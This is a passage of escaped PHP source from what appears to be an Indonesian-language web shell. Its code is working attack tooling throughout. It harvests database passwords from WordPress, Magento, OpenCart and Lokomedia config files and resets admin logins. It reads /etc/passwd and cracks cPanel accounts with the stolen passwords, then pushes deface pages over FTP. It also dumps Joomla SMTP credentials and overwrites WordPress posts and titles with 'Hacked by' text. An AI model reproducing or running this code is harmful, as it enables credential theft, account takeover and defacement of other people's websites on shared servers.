\'","\'");\r\n\t\t\t\t\t$prefix = $dbprefix."users";\r\n\t\t\t\t\t$option = $dbprefix."options";\r\n\t\t\t\t\t$conn = mysql_connect($dbhost,$dbuser,$dbpass);\r\n\t\t\t\t\t$db = mysql_select_db($dbname);\r\n\t\t\t\t\t$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");\r\n\t\t\t\t\t$result = mysql_fetch_array($q);\r\n\t\t\t\t\t$id = $result[ID];\r\n\t\t\t\t\t$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");\r\n\t\t\t\t\t$result2 = mysql_fetch_array($q2);\r\n\t\t\t\t\t$target = $result2[option_value];\r\n\t\t\t\t\tif($target == \'\') {\r\n\t\t\t\t\t\t$url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\t$url_target = "Login => <a href=\'$target/wp-login.php\' target=\'_blank\'><u>$target/wp-login.php</u></a><br>";\r\n\t\t\t\t\t}\r\n\t\t\t\t\t$update = mysql_query("UPDATE $prefix SET user_login=\'$user_baru\',user_pass=\'$pass_baru\' WHERE id=\'$id\'");\r\n\t\t\t\t\techo "Config => ".$file_conf."<br>";\r\n\t\t\t\t\techo "CMS => Wordpress<br>";\r\n\t\t\t\t\techo $url_target;\r\n\t\t\t\t\tif(!$update OR !$conn OR !$db) {\r\n\t\t\t\t\t\techo "Status => <font color=red>".mysql_error()."</font><br><br>";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";\r\n\t\t\t\t\t}\r\n\t\t\t\t\tmysql_close($conn);\r\n\t\t\t\t} elseif(preg_match("/Magento|Mage_Core/",$config)) {\r\n\t\t\t\t\t$dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");\r\n\t\t\t\t\t$dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");\r\n\t\t\t\t\t$dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");\r\n\t\t\t\t\t$dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");\r\n\t\t\t\t\t$dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");\r\n\t\t\t\t\t$prefix = $dbprefix."admin_user";\r\n\t\t\t\t\t$option = $dbprefix."core_config_data";\r\n\t\t\t\t\t$conn = mysql_connect($dbhost,$dbuser,$dbpass);\r\n\t\t\t\t\t$db = mysql_select_db($dbname);\r\n\t\t\t\t\t$q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");\r\n\t\t\t\t\t$result = mysql_fetch_array($q);\r\n\t\t\t\t\t$id = $result[user_id];\r\n\t\t\t\t\t$q2 = mysql_query("SELECT * FROM $option WHERE path=\'web/secure/base_url\'");\r\n\t\t\t\t\t$result2 = mysql_fetch_array($q2);\r\n\t\t\t\t\t$target = $result2[value];\r\n\t\t\t\t\tif($target == \'\') {\r\n\t\t\t\t\t\t$url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\t$url_target = "Login => <a href=\'$target/admin/\' target=\'_blank\'><u>$target/admin/</u></a><br>";\r\n\t\t\t\t\t}\r\n\t\t\t\t\t$update = mysql_query("UPDATE $prefix SET username=\'$user_baru\',password=\'$pass_baru\' WHERE user_id=\'$id\'");\r\n\t\t\t\t\techo "Config => ".$file_conf."<br>";\r\n\t\t\t\t\techo "CMS => Magento<br>";\r\n\t\t\t\t\techo $url_target;\r\n\t\t\t\t\tif(!$update OR !$conn OR !$db) {\r\n\t\t\t\t\t\techo "Status => <font color=red>".mysql_error()."</font><br><br>";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";\r\n\t\t\t\t\t}\r\n\t\t\t\t\tmysql_close($conn);\r\n\t\t\t\t} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {\r\n\t\t\t\t\t$dbhost = ambilkata($config,"\'DB_HOSTNAME\', \'","\'");\r\n\t\t\t\t\t$dbuser = ambilkata($config,"\'DB_USERNAME\', \'","\'");\r\n\t\t\t\t\t$dbpass = ambilkata($config,"\'DB_PASSWORD\', \'","\'");\r\n\t\t\t\t\t$dbname = ambilkata($config,"\'DB_DATABASE\', \'","\'");\r\n\t\t\t\t\t$dbprefix = ambilkata($config,"\'DB_PREFIX\', \'","\'");\r\n\t\t\t\t\t$prefix = $dbprefix."user";\r\n\t\t\t\t\t$conn = mysql_connect($dbhost,$dbuser,$dbpass);\r\n\t\t\t\t\t$db = mysql_select_db($dbname);\r\n\t\t\t\t\t$q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");\r\n\t\t\t\t\t$result = mysql_fetch_array($q);\r\n\t\t\t\t\t$id = $result[user_id];\r\n\t\t\t\t\t$target = ambilkata($config,"HTTP_SERVER\', \'","\'");\r\n\t\t\t\t\tif($target == \'\') {\r\n\t\t\t\t\t\t$url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\t$url_target = "Login => <a href=\'$target\' target=\'_blank\'><u>$target</u></a><br>";\r\n\t\t\t\t\t}\r\n\t\t\t\t\t$update = mysql_query("UPDATE $prefix SET username=\'$user_baru\',password=\'$pass_baru\' WHERE user_id=\'$id\'");\r\n\t\t\t\t\techo "Config => ".$file_conf."<br>";\r\n\t\t\t\t\techo "CMS => OpenCart<br>";\r\n\t\t\t\t\techo $url_target;\r\n\t\t\t\t\tif(!$update OR !$conn OR !$db) {\r\n\t\t\t\t\t\techo "Status => <font color=red>".mysql_error()."</font><br><br>";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";\r\n\t\t\t\t\t}\r\n\t\t\t\t\tmysql_close($conn);\r\n\t\t\t\t} elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {\r\n\t\t\t\t\t$dbhost = ambilkata($config,\'server = "\',\'"\');\r\n\t\t\t\t\t$dbuser = ambilkata($config,\'username = "\',\'"\');\r\n\t\t\t\t\t$dbpass = ambilkata($config,\'password = "\',\'"\');\r\n\t\t\t\t\t$dbname = ambilkata($config,\'database = "\',\'"\');\r\n\t\t\t\t\t$prefix = "users";\r\n\t\t\t\t\t$option = "identitas";\r\n\t\t\t\t\t$conn = mysql_connect($dbhost,$dbuser,$dbpass);\r\n\t\t\t\t\t$db = mysql_select_db($dbname);\r\n\t\t\t\t\t$q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");\r\n\t\t\t\t\t$result = mysql_fetch_array($q);\r\n\t\t\t\t\t$target = $result[alamat_website];\r\n\t\t\t\t\tif($target == \'\') {\r\n\t\t\t\t\t\t$target2 = $result[url];\r\n\t\t\t\t\t\t$url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";\r\n\t\t\t\t\t\tif($target2 == \'\') {\r\n\t\t\t\t\t\t\t$url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";\r\n\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t$cek_login3 = file_get_contents("$target2/adminweb/");\r\n\t\t\t\t\t\t\t$cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");\r\n\t\t\t\t\t\t\tif(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {\r\n\t\t\t\t\t\t\t\t$url_target2 = "Login => <a href=\'$target2/adminweb\' target=\'_blank\'><u>$target2/adminweb</u></a><br>";\r\n\t\t\t\t\t\t\t} elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {\r\n\t\t\t\t\t\t\t\t$url_target2 = "Login => <a href=\'$target2/lokomedia/adminweb\' target=\'_blank\'><u>$target2/lokomedia/adminweb</u></a><br>";\r\n\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\t$url_target2 = "Login => <a href=\'$target2\' target=\'_blank\'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\t$cek_login = file_get_contents("$target/adminweb/");\r\n\t\t\t\t\t\t$cek_login2 = file_get_contents("$target/lokomedia/adminweb/");\r\n\t\t\t\t\t\tif(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {\r\n\t\t\t\t\t\t\t$url_target = "Login => <a href=\'$target/adminweb\' target=\'_blank\'><u>$target/adminweb</u></a><br>";\r\n\t\t\t\t\t\t} elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {\r\n\t\t\t\t\t\t\t$url_target = "Login => <a href=\'$target/lokomedia/adminweb\' target=\'_blank\'><u>$target/lokomedia/adminweb</u></a><br>";\r\n\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t$url_target = "Login => <a href=\'$target\' target=\'_blank\'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t\t$update = mysql_query("UPDATE $prefix SET username=\'$user_baru\',password=\'$pass_baru\' WHERE level=\'admin\'");\r\n\t\t\t\t\techo "Config => ".$file_conf."<br>";\r\n\t\t\t\t\techo "CMS => Lokomedia<br>";\r\n\t\t\t\t\tif(preg_match(\'/error, gabisa ambil nama domain nya/\', $url_target)) {\r\n\t\t\t\t\t\techo $url_target2;\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo $url_target;\r\n\t\t\t\t\t}\r\n\t\t\t\t\tif(!$update OR !$conn OR !$db) {\r\n\t\t\t\t\t\techo "Status => <font color=red>".mysql_error()."</font><br><br>";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";\r\n\t\t\t\t\t}\r\n\t\t\t\t\tmysql_close($conn);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t} else {\r\n\t\techo "<center>\r\n\t\t<h1>Auto Edit User Config</h1>\r\n\t\t<form method=\'post\'>\r\n\t\tDIR Config: <br>\r\n\t\t<input type=\'text\' size=\'50\' name=\'config_dir\' value=\'$dir\'><br><br>\r\n\t\tSet User & Pass: <br>\r\n\t\t<input type=\'text\' name=\'user_baru\' value=\'m3r1c4\' placeholder=\'user_baru\'><br>\r\n\t\t<input type=\'text\' name=\'pass_baru\' value=\'m3r1c4\' placeholder=\'pass_baru\'><br>\r\n\t\t<input type=\'submit\' name=\'hajar\' value=\'Submit\' style=\'width: 100px;\'>\r\n\t\t</form>\r\n\t\t<span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>\r\n\t\t";\r\n\t}\r\n} elseif($_GET[\'do\'] == \'cpanel\') {\r\n\tif($_POST[\'crack\']) {\r\n\t\t$usercp = explode("\\r\\n", $_POST[\'user_cp\']);\r\n\t\t$passcp = explode("\\r\\n", $_POST[\'pass_cp\']);\r\n\t\t$i = 0;\r\n\t\tforeach($usercp as $ucp) {\r\n\t\t\tforeach($passcp as $pcp) {\r\n\t\t\t\tif(@mysql_connect(\'localhost\', $ucp, $pcp)) {\r\n\t\t\t\t\tif($_SESSION[$ucp] && $_SESSION[$pcp]) {\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\t$_SESSION[$ucp] = "1";\r\n\t\t\t\t\t\t$_SESSION[$pcp] = "1";\r\n\t\t\t\t\t\tif($ucp == \'\' || $pcp == \'\') {\r\n\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t$i++;\r\n\t\t\t\t\t\t\tif(function_exists(\'posix_getpwuid\')) {\r\n\t\t\t\t\t\t\t\t$domain_cp = file_get_contents("/etc/named.conf");\t\r\n\t\t\t\t\t\t\t\tif($domain_cp == \'\') {\r\n\t\t\t\t\t\t\t\t\t$dom = "<font color=red>gabisa ambil nama domain nya</font>";\r\n\t\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\t\tpreg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);\r\n\t\t\t\t\t\t\t\t\tforeach($domains_cp[1] as $dj) {\r\n\t\t\t\t\t\t\t\t\t\t$user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));\r\n\t\t\t\t\t\t\t\t\t\t$user_cp_url = $user_cp_url[\'name\'];\r\n\t\t\t\t\t\t\t\t\t\tif($user_cp_url == $ucp) {\r\n\t\t\t\t\t\t\t\t\t\t\t$dom = "<a href=\'http://$dj/\' target=\'_blank\'><font color=lime>$dj</font></a>";\r\n\t\t\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\t$dom = "<font color=red>function is Disable by system</font>";\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\techo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\tif($i == 0) {\r\n\t\t} else {\r\n\t\t\techo "<br>Succes!".$i." Cpanel from <font color=lime>Allah SWT</font>";\r\n\t\t}\r\n\t} else {\r\n\t\techo "<center>\r\n\t\t<form method=\'post\'>\r\n\t\tUSER: <br>\r\n\t\t<textarea style=\'width: 450px; height: 150px;\' name=\'user_cp\'>";\r\n\t\t$_usercp = fopen("/etc/passwd","r");\r\n\t\twhile($getu = fgets($_usercp)) {\r\n\t\t\tif($getu == \'\' || !$_usercp) {\r\n\t\t\t\techo "<font color=red>Can\'t read /etc/passwd</font>";\r\n\t\t\t} else {\r\n\t\t\t\tpreg_match_all("/(.*?):x:/", $getu, $u);\r\n\t\t\t\tforeach($u[1] as $user_cp) {\r\n\t\t\t\t\t\tif(is_dir("/home/$user_cp/public_html")) {\r\n\t\t\t\t\t\t\techo "$user_cp\\n";\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\techo "</textarea><br>\r\n\t\tPASS: <br>\r\n\t\t<textarea style=\'width: 450px; height: 200px;\' name=\'pass_cp\'>";\r\n\t\tfunction cp_pass($dir) {\r\n\t\t\t$pass = "";\r\n\t\t\t$dira = scandir($dir);\r\n\t\t\tforeach($dira as $dirb) {\r\n\t\t\t\tif(!is_file("$dir/$dirb")) continue;\r\n\t\t\t\t$ambil = file_get_contents("$dir/$dirb");\r\n\t\t\t\tif(preg_match("/WordPress/", $ambil)) {\r\n\t\t\t\t\t$pass .= ambilkata($ambil,"DB_PASSWORD\', \'","\'")."\\n";\r\n\t\t\t\t} elseif(preg_match("/JConfig|joomla/", $ambil)) {\r\n\t\t\t\t\t$pass .= ambilkata($ambil,"password = \'","\'")."\\n";\r\n\t\t\t\t} elseif(preg_match("/Magento|Mage_Core/", $ambil)) {\r\n\t\t\t\t\t$pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\\n";\r\n\t\t\t\t} elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {\r\n\t\t\t\t\t$pass .= ambilkata($ambil,\'password = "\',\'"\')."\\n";\r\n\t\t\t\t} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {\r\n\t\t\t\t\t$pass .= ambilkata($ambil,"\'DB_PASSWORD\', \'","\'")."\\n";\r\n\t\t\t\t} elseif(preg_match("/client/", $ambil)) {\r\n\t\t\t\t\tpreg_match("/password=(.*)/", $ambil, $pass1);\r\n\t\t\t\t\tif(preg_match(\'/"/\', $pass1[1])) {\r\n\t\t\t\t\t\t$pass1[1] = str_replace(\'"\', "", $pass1[1]);\r\n\t\t\t\t\t\t$pass .= $pass1[1]."\\n";\r\n\t\t\t\t\t}\r\n\t\t\t\t} elseif(preg_match("/cc_encryption_hash/", $ambil)) {\r\n\t\t\t\t\t$pass .= ambilkata($ambil,"db_password = \'","\'")."\\n";\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\techo $pass;\r\n\t\t}\r\n\t\t$cp_pass = cp_pass($dir);\r\n\t\techo $cp_pass;\r\n\t\techo "</textarea><br>\r\n\t\t<input type=\'submit\' name=\'crack\' style=\'width: 100px;\' value=\'Crack\'>\r\n\t\t</form>\r\n\t\t<span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";\r\n\t}\r\n} elseif($_GET[\'do\'] == \'cpftp_auto\') {\r\n\tif($_POST[\'crack\']) {\r\n\t\t$usercp = explode("\\r\\n", $_POST[\'user_cp\']);\r\n\t\t$passcp = explode("\\r\\n", $_POST[\'pass_cp\']);\r\n\t\t$i = 0;\r\n\t\tforeach($usercp as $ucp) {\r\n\t\t\tforeach($passcp as $pcp) {\r\n\t\t\t\tif(@mysql_connect(\'localhost\', $ucp, $pcp)) {\r\n\t\t\t\t\tif($_SESSION[$ucp] && $_SESSION[$pcp]) {\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\t$_SESSION[$ucp] = "1";\r\n\t\t\t\t\t\t$_SESSION[$pcp] = "1";\r\n\t\t\t\t\t\tif($ucp == \'\' || $pcp == \'\') {\r\n\t\t\t\t\t\t\t//\r\n\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\techo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";\r\n\t\t\t\t\t\t\t$ftp_conn = ftp_connect(gethostbyname($_SERVER[\'HTTP_HOST\']));\r\n\t\t\t\t\t\t\t$ftp_login = ftp_login($ftp_conn, $ucp, $pcp);\r\n\t\t\t\t\t\t\tif((!$ftp_login) || (!$ftp_conn)) {\r\n\t\t\t\t\t\t\t\techo "[+] <font color=red>Login Gagal</font><br><br>";\r\n\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\techo "[+] <font color=lime>Login Sukses</font><br>";\r\n\t\t\t\t\t\t\t\t$fi = htmlspecialchars($_POST[\'file_deface\']);\r\n\t\t\t\t\t\t\t\t$deface = ftp_put($ftp_conn, "public_html/$fi", $_POST[\'deface\'], FTP_BINARY);\r\n\t\t\t\t\t\t\t\tif($deface) {\r\n\t\t\t\t\t\t\t\t\t$i++;\r\n\t\t\t\t\t\t\t\t\techo "[+] <font color=lime>Deface Sukses</font><br>";\r\n\t\t\t\t\t\t\t\t\tif(function_exists(\'posix_getpwuid\')) {\r\n\t\t\t\t\t\t\t\t\t\t$domain_cp = file_get_contents("/etc/named.conf");\t\r\n\t\t\t\t\t\t\t\t\t\tif($domain_cp == \'\') {\r\n\t\t\t\t\t\t\t\t\t\t\techo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";\r\n\t\t\t\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\t\t\t\tpreg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);\r\n\t\t\t\t\t\t\t\t\t\t\tforeach($domains_cp[1] as $dj) {\r\n\t\t\t\t\t\t\t\t\t\t\t\t$user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));\r\n\t\t\t\t\t\t\t\t\t\t\t\t$user_cp_url = $user_cp_url[\'name\'];\r\n\t\t\t\t\t\t\t\t\t\t\t\tif($user_cp_url == $ucp) {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\techo "[+] <a href=\'http://$dj/$fi\' target=\'_blank\'>http://$dj/$fi</a><br><br>";\r\n\t\t\t\t\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\t\t\techo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";\r\n\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\t\techo "[-] <font color=red>Deface Gagal</font><br><br>";\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t//echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\tif($i == 0) {\r\n\t\t} else {\r\n\t\t\techo "<br>Succes Deface! ".$i." Cpanel From <font color=lime>ALLAH SWT</font>";\r\n\t\t}\r\n\t} else {\r\n\t\techo "<center>\r\n\t\t<form method=\'post\'>\r\n\t\tFilename: <br>\r\n\t\t<input type=\'text\' name=\'file_deface\' placeholder=\'index.php\' value=\'index.php\' style=\'width: 450px;\'><br>\r\n\t\tDeface Page: <br>\r\n\t\t<input type=\'text\' name=\'deface\' placeholder=\'http://www.web-yang-udah-do-deface.com/filemu.php\' style=\'width: 450px;\'><br>\r\n\t\tUSER: <br>\r\n\t\t<textarea style=\'width: 450px; height: 150px;\' name=\'user_cp\'>";\r\n\t\t$_usercp = fopen("/etc/passwd","r");\r\n\t\twhile($getu = fgets($_usercp)) {\r\n\t\t\tif($getu == \'\' || !$_usercp) {\r\n\t\t\t\techo "<font color=red>Can\'t read /etc/passwd</font>";\r\n\t\t\t} else {\r\n\t\t\t\tpreg_match_all("/(.*?):x:/", $getu, $u);\r\n\t\t\t\tforeach($u[1] as $user_cp) {\r\n\t\t\t\t\t\tif(is_dir("/home/$user_cp/public_html")) {\r\n\t\t\t\t\t\t\techo "$user_cp\\n";\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\techo "</textarea><br>\r\n\t\tPASS: <br>\r\n\t\t<textarea style=\'width: 450px; height: 200px;\' name=\'pass_cp\'>";\r\n\t\tfunction cp_pass($dir) {\r\n\t\t\t$pass = "";\r\n\t\t\t$dira = scandir($dir);\r\n\t\t\tforeach($dira as $dirb) {\r\n\t\t\t\tif(!is_file("$dir/$dirb")) continue;\r\n\t\t\t\t$ambil = file_get_contents("$dir/$dirb");\r\n\t\t\t\tif(preg_match("/WordPress/", $ambil)) {\r\n\t\t\t\t\t$pass .= ambilkata($ambil,"DB_PASSWORD\', \'","\'")."\\n";\r\n\t\t\t\t} elseif(preg_match("/JConfig|joomla/", $ambil)) {\r\n\t\t\t\t\t$pass .= ambilkata($ambil,"password = \'","\'")."\\n";\r\n\t\t\t\t} elseif(preg_match("/Magento|Mage_Core/", $ambil)) {\r\n\t\t\t\t\t$pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\\n";\r\n\t\t\t\t} elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {\r\n\t\t\t\t\t$pass .= ambilkata($ambil,\'password = "\',\'"\')."\\n";\r\n\t\t\t\t} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {\r\n\t\t\t\t\t$pass .= ambilkata($ambil,"\'DB_PASSWORD\', \'","\'")."\\n";\r\n\t\t\t\t} elseif(preg_match("/client/", $ambil)) {\r\n\t\t\t\t\tpreg_match("/password=(.*)/", $ambil, $pass1);\r\n\t\t\t\t\tif(preg_match(\'/"/\', $pass1[1])) {\r\n\t\t\t\t\t\t$pass1[1] = str_replace(\'"\', "", $pass1[1]);\r\n\t\t\t\t\t\t$pass .= $pass1[1]."\\n";\r\n\t\t\t\t\t}\r\n\t\t\t\t} elseif(preg_match("/cc_encryption_hash/", $ambil)) {\r\n\t\t\t\t\t$pass .= ambilkata($ambil,"db_password = \'","\'")."\\n";\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\techo $pass;\r\n\t\t}\r\n\t\t$cp_pass = cp_pass($dir);\r\n\t\techo $cp_pass;\r\n\t\techo "</textarea><br>\r\n\t\t<input type=\'submit\' name=\'crack\' style=\'width: 100px;\' value=\'Submit\'>\r\n\t\t</form>\r\n\t\t<span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";\r\n\t}\r\n} elseif($_GET[\'do\'] == \'smtp\') {\r\n\techo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";\r\n\tfunction scj($dir) {\r\n\t\t$dira = scandir($dir);\r\n\t\tforeach($dira as $dirb) {\r\n\t\t\tif(!is_file("$dir/$dirb")) continue;\r\n\t\t\t$ambil = file_get_contents("$dir/$dirb");\r\n\t\t\t$ambil = str_replace("$", "", $ambil);\r\n\t\t\tif(preg_match("/JConfig|joomla/", $ambil)) {\r\n\t\t\t\t$smtp_host = ambilkata($ambil,"smtphost = \'","\'");\r\n\t\t\t\t$smtp_auth = ambilkata($ambil,"smtpauth = \'","\'");\r\n\t\t\t\t$smtp_user = ambilkata($ambil,"smtpuser = \'","\'");\r\n\t\t\t\t$smtp_pass = ambilkata($ambil,"smtppass = \'","\'");\r\n\t\t\t\t$smtp_port = ambilkata($ambil,"smtpport = \'","\'");\r\n\t\t\t\t$smtp_secure = ambilkata($ambil,"smtpsecure = \'","\'");\r\n\t\t\t\techo "SMTP Host: <font color=lime>$smtp_host</font><br>";\r\n\t\t\t\techo "SMTP port: <font color=lime>$smtp_port</font><br>";\r\n\t\t\t\techo "SMTP user: <font color=lime>$smtp_user</font><br>";\r\n\t\t\t\techo "SMTP pass: <font color=lime>$smtp_pass</font><br>";\r\n\t\t\t\techo "SMTP auth: <font color=lime>$smtp_auth</font><br>";\r\n\t\t\t\techo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\t$smpt_hunter = scj($dir);\r\n\techo $smpt_hunter;\r\n} elseif($_GET[\'do\'] == \'auto_wp\') {\r\n\tif($_POST[\'hajar\']) {\r\n\t\t$title = htmlspecialchars($_POST[\'new_title\']);\r\n\t\t$pn_title = str_replace(" ", "-", $title);\r\n\t\tif($_POST[\'cek_edit\'] == "Y") {\r\n\t\t\t$script = $_POST[\'edit_content\'];\r\n\t\t} else {\r\n\t\t\t$script = $title;\r\n\t\t}\r\n\t\t$conf = $_POST[\'config_dir\'];\r\n\t\t$scan_conf = scandir($conf);\r\n\t\tforeach($scan_conf as $file_conf) {\r\n\t\t\tif(!is_file("$conf/$file_conf")) continue;\r\n\t\t\t$config = file_get_contents("$conf/$file_conf");\r\n\t\t\tif(preg_match("/WordPress/", $config)) {\r\n\t\t\t\t$dbhost = ambilkata($config,"DB_HOST\', \'","\'");\r\n\t\t\t\t$dbuser = ambilkata($config,"DB_USER\', \'","\'");\r\n\t\t\t\t$dbpass = ambilkata($config,"DB_PASSWORD\', \'","\'");\r\n\t\t\t\t$dbname = ambilkata($config,"DB_NAME\', \'","\'");\r\n\t\t\t\t$dbprefix = ambilkata($config,"table_prefix = \'","\'");\r\n\t\t\t\t$prefix = $dbprefix."posts";\r\n\t\t\t\t$option = $dbprefix."options";\r\n\t\t\t\t$conn = mysql_connect($dbhost,$dbuser,$dbpass);\r\n\t\t\t\t$db = mysql_select_db($dbname);\r\n\t\t\t\t$q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");\r\n\t\t\t\t$result = mysql_fetch_array($q);\r\n\t\t\t\t$id = $result[ID];\r\n\t\t\t\t$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");\r\n\t\t\t\t$result2 = mysql_fetch_array($q2);\r\n\t\t\t\t$target = $result2[option_value];\r\n\t\t\t\t$update = mysql_query("UPDATE $prefix SET post_title=\'$title\',post_content=\'$script\',post_name=\'$pn_title\',post_status=\'publish\',comment_status=\'open\',ping_status=\'open\',post_type=\'post\',comment_count=\'1\' WHERE id=\'$id\'");\r\n\t\t\t\t$update .= mysql_query("UPDATE $option SET option_value=\'$title\' WHERE option_name=\'blogname\' OR option_name=\'blogdescription\'");\r\n\t\t\t\techo "<div style=\'margin: 5px auto;\'>";\r\n\t\t\t\tif($target == \'\') {\r\n\t\t\t\t\techo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";\r\n\t\t\t\t} else {\r\n\t\t\t\t\techo "URL: <a href=\'$target/?p=$id\' target=\'_blank\'>$target/?p=$id</a> -> ";\r\n\t\t\t\t}\r\n\t\t\t\tif(!$update OR !$conn OR !$db) {\r\n\t\t\t\t\techo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";\r\n\t\t\t\t} else {\r\n\t\t\t\t\techo "<font color=lime>sukses di ganti.</font><br>";\r\n\t\t\t\t}\r\n\t\t\t\techo "</div>";\r\n\t\t\t\tmysql_close($conn);\r\n\t\t\t}\r\n\t\t}\r\n\t} else {\r\n\t\techo "<center>\r\n\t\t<h1>Auto Edit Title+Content WordPress</h1>\r\n\t\t<form method=\'post\'>\r\n\t\tDIR Config: <br>\r\n\t\t<input type=\'text\' size=\'50\' name=\'config_dir\' value=\'$dir\'><br><br>\r\n\t\tSet Title: <br>\r\n\t\t<input type=\'text\' name=\'new_title\' value=\'Hacked by \' placeholder=\'New Title\'><br><br>\r\n\t\tEdit Content?: <input type=\'radio\' 